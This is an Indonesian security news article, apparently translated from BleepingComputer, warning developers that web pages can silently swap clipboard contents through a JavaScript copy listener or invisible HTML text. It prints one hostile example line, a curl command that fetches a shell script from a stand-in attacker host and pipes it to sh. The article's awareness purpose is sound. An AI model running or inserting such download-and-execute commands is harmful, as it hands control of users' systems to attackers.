Jangan asal salin-tempel perintah dari halaman web — Anda bisa diretas

Programmers, sysadmins, security researchers dan tech hobbyists menyalin-menempelkan perintah dari halaman web ke konsol atau terminal diperingatkan bahwa mereka berisiko membahayakan sistem mereka.

Seorang teknolog mendemonstrasikan trik sederhana yang akan membuat Anda berpikir dua kali sebelum menyalin dan menempelkan teks dari halaman web.

Backdoor di clipboard Anda?
Baru-baru ini, Gabriel Friedlander, pendiri platform pelatihan kesadaran keamanan Wizer mendemonstrasikan peretasan yang jelas namun mengejutkan yang akan membuat Anda berhati-hati dalam menyalin-menempelkan perintah dari halaman web.

Bukan hal yang aneh bagi pengembang pemula dan terampil untuk menyalin perintah yang umum digunakan dari halaman web (ehem, StackOverflow) dan menempelkannya ke aplikasi mereka, prompt printah Windows atau terminal Linux.

Tetapi Friedlander memperingatkan sebuah halaman web dapat secara diam-diam mengganti konten dari apa yang ada di clipboard Anda, dan apa yang sebenarnya disalin ke clipboard Anda akan sangat berbeda dari apa yang ingin Anda salin.

Lebih buruk lagi, tanpa uji tuntas yang diperlukan, pengembang mungkin hanya menyadari kesalahan mereka setelah menempelkan teks, dan pada saat itu mungkin sudah terlambat.

Dalam bukti konsep sederhana yang diterbitkan di blognya, Friedlander meminta pembaca untuk menyalin perintah sederhana yang dikenal oleh sebagian besar sysadmin dan pengembang:

Halaman HTML Friedlander dengan perintah sederhana yang dapat Anda salin ke clipboard

 

Sekarang, rekatkan apa yang Anda salin dari blog Friedlander ke dalam kotak teks atau Notepapd, dan hasilnya mungkin akan membuat Anda terkejut:
curl http://attacker-domain:8000/shell.sh | sh

Anda tidak hanya mendapatkan perintah yang sama sekali berbeda di clipboard Anda, tetapi untuk memperburuk keadaan, ia memmiliki karakter baris baru (atau "return") di akhir.

Ini berarti contoh di atas akan dieksekusi segera setelah ditempelkan langsung ke terminal Linux.

Mereka yang menempelkan teks mungkin mendapat kesan bahwa mereka menyalin perintah sudo apt update yang familiar dan tidak berbahaya yang digunakan untuk mengambil informasi terbaru pada perangkat lunak yang diinstal pada sistem Anda.

Tapi bukan itu yang terjadi.

Apa yang menyebabkan ini?
Keajaiban ada pada kode JavaScript yang tersembunyi di balik pengaturan halaman HTML PoC oleh Friedlander.

Segera setelah Anda menyalin teks "sudo apt update" yang terdapat dalam elemen HTML, cuplikan kode yang ditampilkan di bawah ini berjalan.

Apa yang terjadi setelahnya adalah "event listener" JavaScript yang menangkap peristiwa peenyalinan dan mengganti data papan klip dengan kode uji berbahaya Friedlander:

Kode JavaScript PoC yang menggantikan konten clipboard

Perhatikan, event listener memiliki berbagai kasus pennggunaan yang sah dalam JavaScript tetapi ini hanyalah salah satu contoh bagaimana mereka dapat disalahgunakan.

"Inilah mengaa Anda TIDAK PERNAH menyalin perintah tempel langsung ke terminal Anda," Friedlander memperingatkan.

"Anda pikir Anda menyalin satu hal, tetapi itu diganti dengan sesuatu yang lain seperti kode berbahaya. Yang diperlukan hanyalah satu baris kode yang disuntikkan ke dalam kode yang Anda salin untuk membuat pintu belakang ke aplikasi Anda."

"Serangan ini sangat sederhana tetapi juga sangat berbahaya."

Seorang pengguna Reddit juga menyajikan contoh alternatif dari trik ini yang tidak memerlukan JavaScript: teks tak terlihat yang dibuat dengan gaya HTML dan CSS yang disalin ke clipboard Anda saat Anda menyalin bagian teks yang terlihat:

HTML yang tidak terlihat (kiri) diambil selama salin-tempel dan memiliki garis tambahan (kanan).
Sumber: JsFiddle

"Masalahnya bukan hanya situs web dapat mengubah konten clipboard Anda menggunakan JavaScript," jelas pengguna SwallowYourDreams.

"Bisa juga hanya menyembunyikan perintah dalam HTML yang tidak terlihat oleh mata manusia, tetapi akan disalin oleh komputer."

Jadi, alasan lain untuk tidak pernah secara membabi buta mempercayai apa yang Anda salin dari halaman web, lebih baik tempel di editor teks terlebih dahulu.

Sederhana, tapi tetap saja pelajaran penting dalam keamanan sehari-hari.

Sumber: https://www.bleepingcomputer.com/news/security/dont-copy-paste-commands-from-webpages-you-can-get-hacked/